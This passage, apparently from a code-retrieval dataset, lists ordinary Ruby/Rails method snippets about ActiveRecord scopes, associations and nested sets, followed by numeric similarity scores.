"def combine!(check_overlap = true)\n if scope = self.aars_options[:scope]\n scope = scope.is_a?(Array) ? scope : [scope]\n select = \"DISTINCT \" + scope.map { |a| connection.quote_column_name(a) }.join(\", \")\n scopes = find(:all, :select => select)\n scopes.each { |scope| combine_with_scope!(scope.attributes, check_overlap)}\n else\n combine_with_scope!(nil, check_overlap)\n end\n end",
"def scopes *names\n self.scope_names ||= []\n\n names.each do |scope|\n self.scope_names << scope\n\n # hand chaining duties off to the ResourceProxy instance\n define_singleton_method scope do\n resource_proxy.append_scope(scope)\n end\n\n # ResourceProxy instance also needs to respond to scopes\n resource_proxy_class.send(:define_method, scope) do\n append_scope(scope)\n end\n end\n\n # self.scope_names.freeze\n end",
"def all_favorites options = {}\n if options.key?(:multiple_scopes) == false\n validate_scopes __method__, options\n elsif options[:multiple_scopes] == true\n results = {}\n options[:scope].each do |scope|\n favorites_scope = favorites_scoped scope\n results[scope] = favorites_scope = apply_options_to_scope favorites_scope, options\n end\n return results\n else\n favorites_scope = favorites_scoped options[:scope]\n return favorites_scope = apply_options_to_scope(favorites_scope, options)\n end\n end",
"def scope\n @scope.dup\n end",
"def scopes\n self.class.scopes\n end",
"def union_scope(*scopes)\n id_column = \"#{table_name}.id\"\n sub_query = scopes.map { |s| s.select(id_column).to_sql }.join(\" UNION \")\n where \"#{id_column} IN (#{sub_query})\"\n end",
"def all_associations(opts={})\n associations = self.models.map {|m| m.associations}.flatten\n if opts[:unique]\n unique_codes = associations.map {|a| a[:code] }.uniq\n unique_associations = []\n associations.each do |a|\n if unique_codes.include?(a[:code])\n unique_associations << a\n unique_codes.delete(a[:code])\n end\n end\n return unique_associations\n else\n return associations\n end\n end",
"def query_scope\n record_class.public_send(include_strategy, included_associations)\n end",
"def build_scope_from_columns\n self.scope\n end",
"def associations!(merge: true)\n merge ? PathMerger.new(@associations).merge : @associations\n end",
"def all(options = {})\n objs = decorated_class.all.map { |o| new(o) }\n resolve_associations(objs, options)\n end",
"def aggregate scope\n # TODO fucking slow\n data = {}\n data[:sha] = self.sha\n data[:short_sha] = self.short_sha\n data[:author_name] = self.author.name\n data[:author_email] = self.author.email\n data[:time] = self.time.xmlschema\n data[:message] = self.message\n data[:stats] = self.stats\n if scope == :single\n data[:project] = {}\n data[:current_branch] = @project.branchname\n data[:project][:path] = @project.path\n data[:project][:name] = @project.name\n data[:project][:remotes] = @project.remotes.map(&:name)\n data[:project][:remote_urls] = @project.remotes.map(&:url)\n data[:project][:remote_branches] = @project.remote_branches\n data[:project][:identifier] = self.project_identifier\n end\n data\n end",
"def find_all(options = {})\n construct_scope(options).to_a\n end",
"def reset_associations_loaded\n associations_loaded = []\n end",
"def target_scope\n AssociationRelation.create(klass, self).merge!(klass.scope_for_association)\n end",
"def all_orderable\n if self.class.orderable_scope.any?\n scope = self.class.orderable_scope.inject({}) do |where, scope_name|\n where[scope_name] = self[scope_name]\n where\n end\n self.class.where(scope)\n else\n self.class.scoped\n end\n end",
"def relation_all(model)\n validate_model(model)\n model.all\n end",
"def aggregated_associations\n @aggregated_associations ||= []\n end",
"def scopes\n scopes = scope ? scope.split(/\\s+/) : []\n scopes = attributes[:scope]\n Set.new(scopes).to_s\n end",
"def scope\n @scope ||= {}\n end",
"def scope\n @scope ||= {}\n end",
"def map(scopes)\n scpes = Array(scopes.to_a).reduce([]){|memo, sc|\n memo + Array(@mapping.fetch(sc, sc))\n }.uniq\n\n Scopes.wrap(scpes)\n end",
"def finalize_associations!(relations:)\n super do\n associations.map do |definition|\n Memory::Associations.const_get(definition.type).new(definition, relations)\n end\n end\n end",
"def use_scopes(*klasses, &block)\n self.scope_context += klasses.flatten\n yield\n self.scope_context -= klasses.flatten\n nil # should not be chained\n end",
"def all\n @data_adapter.relations\n end",
"def all_related_models\n via_assay = related_assays.collect do |assay|\n assay.model_masters\n end.flatten.uniq.compact\n via_assay | related_models\n end",
"def associations\n @associations.dup\n end",
"def scoped_all\n # The range is shared among all subclasses of the base class, which directly extends ActiveRecord::Base\n self.class.base_class.where(scoped_condition)\n end",
"def all_children(scope = {})\n full_set(scope) - [self]\n end",
"def associations\n @_associations.dup\n end",
"def all_associations(opts={})\n associations = self.models.map {|m| m.association_fields}.flatten\n if opts[:unique]\n unique_codes = associations.map {|a| a[:code] }.uniq\n unique_associations = []\n associations.each do |a|\n if unique_codes.include?(a[:code])\n unique_associations << a\n unique_codes.delete(a[:code])\n end\n end\n return unique_associations\n else\n return associations\n end\n end",
"def all_scopes(_user_id=nil)\n debug{\"_user_id: #{_user_id}, @all_scopes: #{@all_scopes}\"}\n if _user_id && !@all_scopes.to_h.has_key?('identity') || @all_scopes.nil?\n @all_scopes = (\n scopes = case\n when params['scope']\n {'classic' => params['scope'].words}\n when params['scopes']\n params['scopes']\n when is_app_token?\n apps_permissions_scopes_list\n end\n \n scopes['identity'] = apps_permissions_users_list(_user_id) if _user_id && is_app_token?\n params['scopes'] = scopes\n )\n else\n @all_scopes\n end\n end",
"def static_scopes\n scopes = self.scope_definition\n .select { |_k, v| v.blank? }\n .keys\n scopes | [:first, :last, :all]\n end",
"def apply_to_scope(scope)\n scope\n end",
"def filter_scopes\n @filter_scopes ||= scopes.inject({}) do |result, element|\n result[element.first] = element.last if element.last[:type] != :boolean\n result\n end\n end",
"def data_scope\n if Company.columns.map(&:name).include?(\"deleted_at\")\n yield\n else\n Company.unscoped do\n Recognition.unscoped do\n User.unscoped do\n yield\n end\n end\n end\n end\n end",
"def apply_custom_scope\n each_sort do |attribute, direction|\n @scope = custom_scope\n .call(@scope, attribute, direction, resource.context)\n end\n @scope\n end",
"def related_models\n via_assay = assays.collect(&:models).flatten.uniq.compact\n via_assay | models\n end",
"def attributes(*attributes)\n @attributes.concat(attributes)\n @scope = @scope.includes(@scope.filter_associations(attributes))\n end",
"def empty_scope\n scope_from_product_ids([])\n end",
"def reflect_on_all_associations(*macros)\n relations.values.select { |meta| macros.include?(meta.macro) }\n end",
"def relations\n @relations ||= process_rels\n end",
"def people_scope\n Person.all.order_by_full_name\n end",
"def union(*relations)\n relations.all?{|r| is_relation!(r)}\n relations.inject(nil){|memo,r| memo.nil? ? r : memo.union(r)}\n end",
"def extra_scopes()\n @scopes_added_by_common_scopes\n end",
"def scope\n @scope ||= Array(@root_scope) + [Inflector.underscore(name)]\n end",
"def all_favorites(options = {})\n if options.key?(:multiple_scopes) == false\n validate_scopes(__method__, options)\n elsif options[:multiple_scopes]\n results = {}\n options[:scope].each do |scope|\n favorites_scope = favorites_scoped(\n scope: scope, multiple_scopes: false\n )\n results[scope] = apply_options_to_scope(\n favorites_scope, options\n )\n end\n results\n else\n favorites_scope = favorites_scoped(\n scope: options[:scope], multiple_scopes: false\n )\n apply_options_to_scope(\n favorites_scope, options\n )\n end\n end",
"def resolve!\n @relations.map(&:resolve!)\n end",
"def apply_and_return_additional_attributes_to(scope:)\n # With this short-circuit we preserve the ability to have\n # `.count` work on the scope.\n return scope if additional_attributes.empty?\n\n attr_table_name = Models::AdditionalAttribute.quoted_table_name\n work_table_name = scope.quoted_table_name\n select_fields = scope.column_names.map { |column_name| \"#{work_table_name}.#{column_name}\" }\n group_by_fields = select_fields.clone\n\n additional_attributes.each do |attribute|\n table_name = attribute.fetch(:join_as_table_name)\n key = attribute.fetch(:key)\n scope = scope.joins(\n %(LEFT OUTER JOIN #{attr_table_name} AS #{table_name} ON #{table_name}.work_id = #{work_table_name}.id AND #{table_name}.key = \"#{key}\")\n )\n\n # Given that we may have multiple values, we need to do some\n # concatenation so that we can preserve a single row per\n # work.\n select_fields << \"GROUP_CONCAT(DISTINCT #{table_name}.value SEPARATOR ', ') AS #{key}\"\n end\n\n # Given that each additional attribute could have multiple\n # values, we need to group by the attributes on the base\n # table.\n scope = scope.group(group_by_fields)\n\n # Note this must return the modified scope.\n scope.select(select_fields.join(\", \"))\n end",
"def all(params={})\n scoped_attributes = self.class.scopes.inject({}){|r,k| r.merge(k.to_s => send(k))}\n scoped_attributes.merge!(params)\n body = connection.send(collection_method, scoped_attributes).body\n\n collection = self.load(body[collection_root])\n collection.merge_attributes(Cistern::Hash.slice(body, \"count\", \"next_page\", \"previous_page\"))\n collection\n end",
"def relations\n return @relations if defined?(@relations)\n\n relations = injected_options.fetch(:relations, nil)\n relations = allowed_options.fetch(:relations, []) if relations.nil?\n\n @relations = Relations.new(relations, includes)\n end",
"def freeze\n associations\n super\n associations.freeze\n self\n end",
"def clear_association_scope_cache # :nodoc:\n @association_scope_cache.clear\n end",
"def entity_scope type, viewer\n # type.constantize.tagged_by list.name_tag, [ list.owner_id, viewer.id ]\n type.constantize.joins(:taggings).merge(Tagging.list_scope @list, viewer.id)\n end",
"def renumber_all\n scopes = []\n # only call it once for each scope_condition (if the scope conditions are messed up, this will obviously cause problems)\n roots.each do |r|\n r.renumber_full_tree unless scopes.include?(r.scope_condition)\n scopes << r.scope_condition\n end\n end",
"def collection\n get_collection_ivar || begin\n c = end_of_association_chain\n set_collection_ivar(c.respond_to?(:scoped) ? c.scoped : c.all)\n end\n end",
"def resolve_collections\n @resolved_collections = resolved_associations_map.inject({}) do |hash, (k,v)|\n collection_records = []\n collection_associations = Array.wrap(v[:associations])\n collection_associations.each do |association|\n add_records_from_collection_association(relation, association, collection_records)\n end\n collection_records.flatten!\n collection_records.compact!\n collection_records.uniq!\n hash[k] = collection_records\n hash\n end\n end",
"def namespace_scopes\n super\n end",
"def full_set(scope = {})\n if exclude = scope.delete(:exclude)\n exclude_str = \" AND NOT (#{base_set_class.sql_for(exclude)}) \"\n elsif new_record? || self[right_col_name] - self[left_col_name] == 1\n return [self]\n end\n self.class.find_in_nested_set(:all, { \n :order => \"#{prefixed_left_col_name}\",\n :conditions => \"#{scope_condition} #{exclude_str} AND (#{prefixed_left_col_name} BETWEEN #{self[left_col_name]} AND #{self[right_col_name]})\"\n }, scope)\n end",
"def model_relationships\n hash = ActiveSupport::OrderedHash.new\n reflect_on_all_associations.map { |i| hash[i.name] = i.macro }\n return hash\n end",
"def clear(scope = :all)\n case scope\n when :all\n @plurals, @singulars, @uncountables = [], [], []\n else\n instance_variable_set \"@#{scope}\", []\n end\n end",
"def reset(scope = :all)\n case scope\n when :all\n %i[singulars plurals uncountables].map {|s| clear(s) }\n else\n clear(scope)\n end\n end",
"def with_default_scope\n queryable.with_default_scope\n end",
"def leave_scope\n # puts __callee__\n current_scope = symbol_table.current_scope\n parent_scope = current_scope.parent\n return unless parent_scope\n\n # Retrieve all i_names from current scope\n i_name_set = Set.new(current_scope.defns.values.map(&:i_name))\n\n # Remove all associations from queue until the scope's bookmark\n items = blackboard.leave_scope\n curr_asc, ancestor_asc = items.partition do |a|\n i_name_set.include? a.i_name\n end\n vars_to_keep = Set.new\n\n ancestor_asc.each do |assoc|\n if assoc.dependencies(self).intersect?(i_name_set)\n dependents = assoc.dependencies(self).intersection(i_name_set)\n vars_to_keep.merge(dependents)\n end\n enqueue_association(assoc, nil) # parent_scope\n end\n\n assocs_to_keep = []\n\n unless vars_to_keep.empty?\n loop do\n to_keep, to_consider = curr_asc.partition do |a|\n vars_to_keep.include? a.i_name\n end\n break if to_keep.empty?\n\n to_keep.each do |a|\n vars_to_keep.merge(a.dependencies(self).intersection(i_name_set))\n end\n assocs_to_keep.concat(to_keep)\n curr_asc = to_consider\n end\n end\n symbol_table.leave_scope\n\n vars_to_keep.each do |i_name|\n v = LogVar.new(i_name)\n v.suffix = ''\n symbol_table.insert(v)\n end\n\n assocs_to_keep.each { |a| blackboard.enqueue_association(a) }\n end",
"def renumber_all\n scopes = []\n # only call it once for each scope_condition (if the scope conditions are messed up, this will obviously cause problems)\n roots.each do |r|\n r.renumber_full_tree unless scopes.include?(r.scope_condition)\n scopes << r.scope_condition\n end\n end",
"def each\n @scope.each do |record|\n yield record.restrict(@context, options_with_eager_load)\n end\n end",
"def available_scopes\n (default_scopes << Doorkeeper.config.optional_scopes.to_a).flatten.uniq\n end",
"def finalize_associations\n @association_reflections.each_value(&:finalize)\n end",
"def nested_set_scope_without_default_scope(options = {})\n add_scope_conditions_to_options(options)\n\n self.class.base_class.unscoped.nested_set_scope options\n end",
"def scopes\n @scopes ||= config[:scopes] || []\n end",
"def base_scope\n ApplicationRecord.none\n end",
"def clear(scope = :all)\n case scope\n when :all\n clear(:acronyms)\n clear(:plurals)\n clear(:singulars)\n clear(:uncountables)\n clear(:humans)\n when :acronyms\n @acronyms = {}\n define_acronym_regex_patterns\n when :uncountables\n @uncountables = Uncountables.new\n when :plurals, :singulars, :humans\n instance_variable_set \"@#{scope}\", []\n end\n end",
"def initialize_relationships\n @mappers.each do |mapper|\n @relationships.merge(mapper.relationships.find_dependent(@model))\n end\n\n @relationships.freeze\n end",
"def scopes\n params['scope']\n end"
] |
[
"0.6877863",
"0.6873067",
"0.668376",
"0.6230345",
"0.6188568",
"0.6159825",
"0.6127702",
"0.60165966",
"0.5983767",
"0.5974696",
"0.5947624",
"0.5935974",
"0.5888036",
"0.5887737",
"0.58800286",
"0.5873672",
"0.5866571",
"0.5864613",
"0.5861562",
"0.58515227",
"0.58487016",
"0.5843094",
"0.5843094",
"0.5736831",
"0.5606691",
"0.5582978",
"0.54562193",
"0.5418009",
"0.5408315",
"0.5394606",
"0.53897524",
"0.538871",
"0.5370442",
"0.53602654",
"0.5359426",
"0.5358559",
"0.5352831",
"0.53483987",
"0.5338745",
"0.53233993",
"0.532337",
"0.5314632",
"0.5299036",
"0.52732396",
"0.5271718",
"0.5270734",
"0.5268054",
"0.5268054",
"0.5261176",
"0.5250181",
"0.5228763",
"0.5227976",
"0.52275366",
"0.52194214",
"0.52179915",
"0.5213944",
"0.5202492",
"0.5201005",
"0.51956284",
"0.5190985",
"0.519033",
"0.5190199",
"0.51899844",
"0.5172354",
"0.5169796",
"0.5166379",
"0.5164075",
"0.5163767",
"0.51586044",
"0.51575434",
"0.5150558",
"0.5145363",
"0.5133739",
"0.5130285",
"0.512247",
"0.51214457",
"0.5121026",
"0.511737",
"0.51173514",
"0.5114449",
"0.5112056",
"0.5097225",
"0.50785196",
"0.50714165",
"0.5069303",
"0.50667757",
"0.50655615",
"0.50655586",
"0.5064829",
"0.5064666",
"0.505261",
"0.505073",
"0.50458467",
"0.50389993",
"0.50308317",
"0.50198466",
"0.5013254",
"0.50073195",
"0.5006741",
"0.500554",
"0.4996932"
] |
0.0
|
-1
|
Optional method to override in a child class. Each subquery method does exactly one thing; you can add more filters/scopes in the child class, and call `super` to keep the basic scopes. Usage: def subqueries; super + [new_filter, special_scope_for_child_class]; end
|
def subqueries
[
select_distinct_on,
# default filters -- all scopes have them
filter_by_subscription_or_topics,
filter_by_start_date,
filter_by_end_date,
# grouping
group_distinct_on,
# ordering for GROUP BY
order_distinct_on,
]
end
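
For illustration, a child class would extend the list as the query describes; a minimal sketch, where `filter_by_status` and `order_by_priority` are hypothetical scope methods defined on the child and not taken from the source:

def subqueries
  super + [
    filter_by_status,    # hypothetical extra filter on the child class
    order_by_priority,   # hypothetical child-specific scope
  ]
end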
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def inherited(subclass)\n super\n\n subclass.stradivari_filter_options(\n self.stradivari_filter_options\n )\n\n subclass.stradivari_scopes.update(\n self.stradivari_scopes\n )\n end",
"def _refine_top_query_scope\n # recommended before_filter for subclasses to restrict @parent_object further.\n raise \"Override in subclass.\"\n end",
"def inherited(base)\n base.instance_variable_set '@filters', {}\n end",
"def inherited(subclass)\n super\n subclass.scopes = scopes.dup\n end",
"def filter\n super\n end",
"def filter(*args)\n raise NotImplementedError, 'Subclass should implement.'\n end",
"def search_scope\n super\n end",
"def query\n super\n end",
"def conditions\n if self == Base\n own_conditions\n else\n superclass.conditions.merge(own_conditions)\n end\n end",
"def after_inherited(base)\n # E.g. filters = { automate: [:load_recipe, :load_session], edit: [:load_recipe] }\n base.class_eval do\n # |automate, [:load_recipe, :load_session]|\n filters.each_pair do |name, filter_list|\n\n # def automate_with_filters\n # load_recipe\n # load_session\n # automate_without_filters\n # end\n define_method \"#{ name }_with_filters\" do\n filter_list.each { |filter_name| send(filter_name) }\n send(\"#{ name }_without_filters\")\n end\n\n # alias_method_chain automate, filters\n alias_method \"#{ name }_without_filters\", name\n alias_method name, \"#{ name }_with_filters\"\n end\n end\n end",
"def addfilter( newfilter )\n if not subfilter\n @subfilter = newfilter\n else\n subfilter.addfilter( newfilter )\n end\n return self\n end",
"def scoped_all\n # The range is shared among all subclasses of the base class, which directly extends ActiveRecord::Base\n self.class.base_class.where(scoped_condition)\n end",
"def method_missing(method_name, *args, &block)\n if Query.instance_methods(false).include?(method_name)\n Query.new(self).send(method_name, *args, &block)\n else\n super\n end\n end",
"def prepare(base, settings)\n super\n\n prepare_sub_query(base, settings)\n end",
"def self_and_ancestors\n nested_set_scope.\n where(\n \"(#{self.class.quoted_table_name}.#{self.class.quoted_total_order_column_name} < ?\n and ? < (#{self.class.quoted_table_name}.#{self.class.quoted_snumv_column_name}/#{self.class.quoted_table_name}.#{self.class.quoted_sdenv_column_name})) or\n #{self.class.quoted_table_name}.#{self.class.quoted_primary_column_name} = ?\", self.total_order, self.total_order, self.primary_id\n )\n end",
"def inherited(subclass)\n subclass.sorter = sorter\n super\n end",
"def query_base\n @query_base ||= lambda do\n el = '?'\n [Func::UNACCENT].each do |func|\n el = \"#{func}(#{el})\"\n end\n el\n end.call\n end",
"def _update_dataset\n apply_instance_filters(super)\n end",
"def inherited(base); end",
"def filter(options={})\n super\n end",
"def filter_by_associations_add_conditions?\n super || self[:order] || self[:eager_limit_strategy] || self[:filter_limit_strategy]\n end",
"def descendants\n model_base_class.scoped(:conditions => descendant_conditions)\n end",
"def inherited(subclass); end",
"def predicate\n operand.predicate.and(super).optimize\n end",
"def filter(sparql)\n raise \"Must be overridden\"\n end",
"def inherited(child)\n super\n child.attribute_names = self.attribute_names ? self.attribute_names.dup : [:id]\n child.reverse_solr_name_cache = self.reverse_solr_name_cache ? self.reverse_solr_name_cache.dup : {}\n child.attribute_cache = self.attribute_cache ? self.attribute_cache.dup : {}\n child.facets = self.facets ? self.facets.dup : []\n child.solr_calc_attributes = self.solr_calc_attributes.present? ? self.solr_calc_attributes.dup : {}\n # child.derived_af_class\n\n # If there's no class between +LockedLdpObject+ and this child that's\n # already had +visibility+ and +owner+ defined, define them.\n child.class_eval do\n unless attribute_names.include?(:visibility)\n has_attribute :visibility, ::VOCABULARY[:jupiter_core].visibility, solrize_for: [:exact_match, :facet]\n end\n unless attribute_names.include?(:owner)\n has_attribute :owner, ::VOCABULARY[:jupiter_core].owner, solrize_for: [:exact_match]\n end\n unless attribute_names.include?(:record_created_at)\n has_attribute :record_created_at, ::VOCABULARY[:jupiter_core].record_created_at, type: :date,\n solrize_for: [:sort]\n end\n end\n end",
"def inherit_scope(other)\n @scope = other.scope\n end",
"def sub_filter(iter)\n filter = default_filter(iter)\n if iter.parent[0] == SELECT_RECORDS\n filter += \"AND records.rrecord=#{iter[3].split(\"@@@\")[1]}\" # Extract rrecord from the sort column\n end\n return filter\n end",
"def results(base_query)\n return base_query if @filters.nil?\n base_query.where @filters\n end",
"def scoped_collection(_parent_records)\n raise NotImplementedError.new 'override #scoped_collection in a subclass'\n end",
"def evaluate\n raise Error::MethodShouldBeOverridenByExtendingClassError if instance_of? Operand\n super\n end",
"def method_missing(name, *args)\n if scopes[name].nil?\n super\n else\n execute_scope(name, *args)\n end\n end",
"def inherited(subclass)\n super\n\n ds = dataset\n\n subclass.period_start_date_column = period_start_date_column\n subclass.period_end_date_column = period_end_date_column\n subclass.instance_eval do\n set_dataset(ds)\n end\n end",
"def children\n base_set_class.find(:all, :conditions => \"#{scope_condition} AND #{parent_col_name} = #{self.id}\", :order => left_col_name)\n end",
"def self_and_ancestors\n base_class.all scoped(left_column_name => { '$lte' => left }, right_column_name => { '$gte' => right })\n end",
"def filter\n \n ## Make sure this object quacks like the suitable variety of duck\n self.class::REQUIRED_QUACKS.each do |method|\n \n return nil unless self.respond_to? method\n return nil unless self.send(method)\n \n end\n \n return self\n \n end",
"def inherited(_sub)\n raise Error, \"cannot subclass #{self}\" unless self == Object\n end",
"def included(base)\n super(base)\n base.extend(ClassMethods)\n base.extend(ClassScope)\n end",
"def primary_where_clause\n raise StandardError, 'To use #totalise_query, you must implement #primary_where_clause'\n end",
"def initialize(base, &filter)\n @base = base\n @filter = filter\n end",
"def inherited( subclass )\n\t\t\tsuper\n\t\t\tsubclass.instance_variable_set( :@paramvalidator, self.paramvalidator.dup )\n\t\t\tself.log.debug \"Adding param validator: %p\" % [ self.paramvalidator ]\n\t\tend",
"def to_query(_model)\n raise 'subclasses should implement this method.'\n end",
"def self_and_descendants\n base_class.all scoped(left_column_name => { '$gte' => left }, right_column_name => { '$lte' => right })\n end",
"def self_and_ancestors\n base_set_class.find(:all, :conditions => \"#{scope_condition} AND (#{self[left_col_name]} BETWEEN #{left_col_name} AND #{right_col_name})\", :order => left_col_name )\n end",
"def inherited( subclass )\n\t\t\tsuper\n\t\t\tStrelka::App::Auth.extended_apps << subclass\n\t\t\tsubclass.instance_variable_set( :@auth_provider, @auth_provider )\n\t\t\tsubclass.instance_variable_set( :@positive_auth_criteria, @positive_auth_criteria.dup )\n\t\t\tsubclass.instance_variable_set( :@negative_auth_criteria, @negative_auth_criteria.dup )\n\t\t\tsubclass.instance_variable_set( :@positive_perms_criteria, @positive_perms_criteria.dup )\n\t\t\tsubclass.instance_variable_set( :@negative_perms_criteria, @negative_perms_criteria.dup )\n\t\tend",
"def super_method; end",
"def filters\n filters_class&.new(self.scoped)\n end",
"def eval_rql(alias_derived_attr = false, &block)\n Dsl::Base.new(self.unscoped, alias_derived_attr).instance_eval(&block)\n end",
"def set_search_scope(opts)\n opts = check_params(opts,[:search_scopes])\n super(opts)\n end",
"def descendants\n model_base_class.where(descendant_conditions)\n end",
"def apply_scopes(*)\n relation = super\n relation = relation.accessible_by(current_ability) if scope_accessible?\n relation\n end",
"def self_and_siblings\n base_class.all scoped(parent_column_name => _parent_id)\n end",
"def execute(*)\n super\n end",
"def inherited(subclass)\n subclass.instance_variable_set(\"@fields\", fields.dup)\n subclass.instance_variable_set(\"@relations\", relations.dup)\n end",
"def criteria(base, id_list = nil)\n query_criteria(id_list || base.send(foreign_key))\n end",
"def inherited(subclass)\n super\n subclass.acts_as_cacheable_cache = acts_as_cacheable_cache\n subclass.acts_as_cacheable_time_to_live = acts_as_cacheable_time_to_live\n subclass.acts_as_cacheable_logger = acts_as_cacheable_logger\n end",
"def exec\n super\n end",
"def ratings_query\n super\n end",
"def filter_prepare(current_filter = @filter, subfilter = @subfilter)\n verified_filter = @filters.assoc(current_filter) ? current_filter : @filters.first[0]\n subfilter ||= {}\n the_filter = @filters.assoc(verified_filter)[1]\n # I had to do this in this kind of funny way to avoid actually modifying @filters.\n find_conditions = the_filter.has_key?(:conditions) ? the_filter[:conditions].dup : ['1']\n find_include = []\n # find_conditions += filter[:conditions] if filter.has_key?(:conditions)\n find_include += the_filter[:include] if the_filter.has_key?(:include)\n # If no subfilters have been checked, this should be skipped, accept all\n # If some subfilters have been checked, only the checked ones will be traversed.\n # Within a single key, two checks yields OR\n # Across keys, two checks yield AND\n # The idea is that the subfilter conditions will read \"field in (?)\"\n # And then the keys will provide the array of options\n subfilter.each do |key, sf|\n fsf = the_filter[:subfilters].assoc(key)[1].dup\n find_conditions[0] += (' and ' + fsf[:conditions])\n find_conditions << sf.keys\n find_include << fsf[:include] if fsf.has_key?(:include)\n end\n total_records = scoped_model.count(:all, :include => find_include, :conditions => find_conditions)\n # puts \"%%%%% FILTER INFO IN FILTER_PREPARE: include:[#{find_include.inspect}], conditions:[#{find_conditions.inspect}].\"\n return[verified_filter, subfilter, find_include, find_conditions, total_records]\n end",
"def inherited(subclass)\n # Copy properties from parent to subclass\n resource_class.properties.each do |_name, config|\n subclass.property config.term, predicate: config.predicate, class_name: config.class_name\n end\n\n subclass.configure_model\n end",
"def inherited(base)\n subclasses << base\n super(base)\n end",
"def altered()\n puts \"CHILD, BEFORE PARENT altered()\" # change to altered() before calling the base class instance method with same name\n super() # base method with name name is call here\n puts \"CHILD, AFTER PARENT altered()\" # change to altered() after calling the base class instance method with same name\n end",
"def inherited( subclass )\n\t\tsuper\n\t\tStrelka::Discovery.log.info \"%p inherited by discoverable class %p\" % [ self, subclass ]\n\t\tStrelka::Discovery.add_inherited_class( subclass )\n\tend",
"def initialize\n super(\"query\")\n end",
"def inherited(subclass)\n super\n subclass.instance_variable_set(:@comparison_attrs, comparison_attrs.dup)\n end",
"def inherited(subclass)\n super\n subclass.rules.update self.rules\n end",
"def prepare_sub_query(base, settings)\n @union_all = settings.union_all if @union_all.nil?\n @sub_query ||= settings.sub_query\n @depth ||= settings.depth\n @path ||= settings.path\n\n # Collect the connection\n @connect ||= settings.connect || begin\n key = base.primary_key\n [key.to_sym, :\"parent_#{key}\"] unless key.nil?\n end\n\n raise ArgumentError, <<-MSG.squish if @sub_query.nil? && @query.is_a?(String)\n Unable to generate sub query from a string query. Please provide a `sub_query`\n property on the \"#{table_name}\" settings.\n MSG\n\n if @sub_query.nil?\n raise ArgumentError, <<-MSG.squish if @connect.blank?\n Unable to generate sub query without setting up a proper way to connect it\n with the main query. Please provide a `connect` property on the \"#{table_name}\"\n settings.\n MSG\n\n left, right = @connect.map(&:to_s)\n condition = @query.arel_table[right].eq(table[left])\n\n if @query.where_values_hash.key?(right)\n @sub_query = @query.unscope(where: right.to_sym).where(condition)\n else\n @sub_query = @query.where(condition)\n @query = @query.where(right => nil)\n end\n elsif @sub_query.respond_to?(:call)\n # Call a proc to get the real sub query\n call_args = @sub_query.try(:arity) === 0 ? [] : [OpenStruct.new(@args)]\n @sub_query = @sub_query.call(*call_args)\n end\n end",
"def define_scope_method(name)\n singleton_class.class_eval do\n ruby2_keywords(\n define_method(name) do |*args|\n scoping = _declared_scopes[name]\n scope = instance_exec(*args, &scoping[:scope])\n extension = scoping[:extension]\n to_merge = scope || queryable\n criteria = to_merge.empty_and_chainable? ? to_merge : with_default_scope.merge(to_merge)\n criteria.extend(extension)\n criteria\n end\n )\n end\n end",
"def sync_filters\n super.presence || default_sync_filters\n end",
"def initialize(&block)\n @filter = (block || method(:filter))\n super()\n end",
"def set_filter(opts)\n opts = check_params(opts,[:filters])\n super(opts)\n end",
"def sub_query(value = nil, command = nil)\n return unless recursive?\n return @sub_query if value.nil?\n\n @sub_query = sanitize_query(value, command)\n end",
"def subquery\n subqueries.\n compact.\n inject(&:merge)\n end",
"def inherited( subclass )\n\t\t\tsuper\n\n\t\t\tverbs_copy = Strelka::DataUtilities.deep_copy( self.resource_verbs )\n\t\t\tsubclass.instance_variable_set( :@resource_verbs, verbs_copy )\n\n\t\t\topts_copy = Strelka::DataUtilities.deep_copy( self.service_options )\n\t\t\tsubclass.instance_variable_set( :@service_options, opts_copy )\n\t\tend",
"def inherited(klass); end",
"def inherited(klass); end",
"def inherited(base)\n Base.inherited(base)\n end",
"def initialize(ancestors, options = {})\n @ancestors = ancestors\n filter(options)\n end",
"def base_scope\n ApplicationRecord.none\n end",
"def before_all\n super if defined?(super)\n end",
"def inherited(subclass)\n Event.all << subclass\n end",
"def extend_inherited_method\n ActiveRecord::Base.class_eval do\n class << self\n def inherited_with_valle_validators(subclass)\n inherited_without_valle_validators(subclass)\n if Valle::Hooks.can_add_validators?(subclass, self)\n Valle::Hooks.add_validators(subclass)\n end\n end\n alias_method_chain :inherited, :valle_validators\n end\n end\n end",
"def search( scope=:subtree, filter='(objectClass=*)', parameters={}, &block )\n\t\tparameters[:selectattrs] |= ['objectClass'] unless\n\t\t\t!parameters.key?( :selectattrs ) || parameters[ :selectattrs ].empty?\n\n\t\tsuper\n\tend",
"def inherited(subclass)\n super\n ivs = subclass.instance_variables\n inherited_instance_variables.each do |iv, dup|\n next if ivs.include?(iv)\n if (sup_class_value = instance_variable_get(iv)) && dup\n sup_class_value = case dup\n when :dup\n sup_class_value.dup\n when :hash_dup\n h = {}\n sup_class_value.each{|k,v| h[k] = v.dup}\n h\n when Proc\n dup.call(sup_class_value)\n else\n raise Error, \"bad inherited instance variable type: #{dup.inspect}\"\n end\n end\n subclass.instance_variable_set(iv, sup_class_value)\n end\n\n unless ivs.include?(\"@dataset\")\n if @dataset && self != Model\n subclass.set_dataset(@dataset.clone, :inherited=>true)\n elsif (n = subclass.name) && !n.to_s.empty?\n db\n subclass.set_dataset(subclass.implicit_table_name)\n end\n end\n end",
"def subtree\n model_base_class.scoped(:conditions => subtree_conditions)\n end",
"def query_scope\n record_class.public_send(include_strategy, included_associations)\n end",
"def build_collection_scope_base(some_instance)\n some_instance.send(@collection_name).scoped\n end",
"def foo(...)\n super(...)\nend",
"def inherited(subclass)\n super\n ivs = subclass.instance_variables.map(&:to_s)\n inherited_instance_variables.each do |iv, dup|\n next if ivs.include?(iv.to_s)\n if (sup_class_value = instance_variable_get(iv)) && dup\n sup_class_value = case dup\n when :dup\n sup_class_value.dup\n when :hash_dup\n h = {}\n sup_class_value.each{|k,v| h[k] = v.dup}\n h\n when Proc\n dup.call(sup_class_value)\n else\n raise Error, \"bad inherited instance variable type: #{dup.inspect}\"\n end\n end\n subclass.instance_variable_set(iv, sup_class_value)\n end\n\n unless ivs.include?(\"@dataset\")\n if @dataset && self != Model\n subclass.set_dataset(@dataset.clone, :inherited=>true)\n elsif (n = subclass.name) && !n.to_s.empty?\n db\n subclass.set_dataset(subclass.implicit_table_name)\n end\n end\n end",
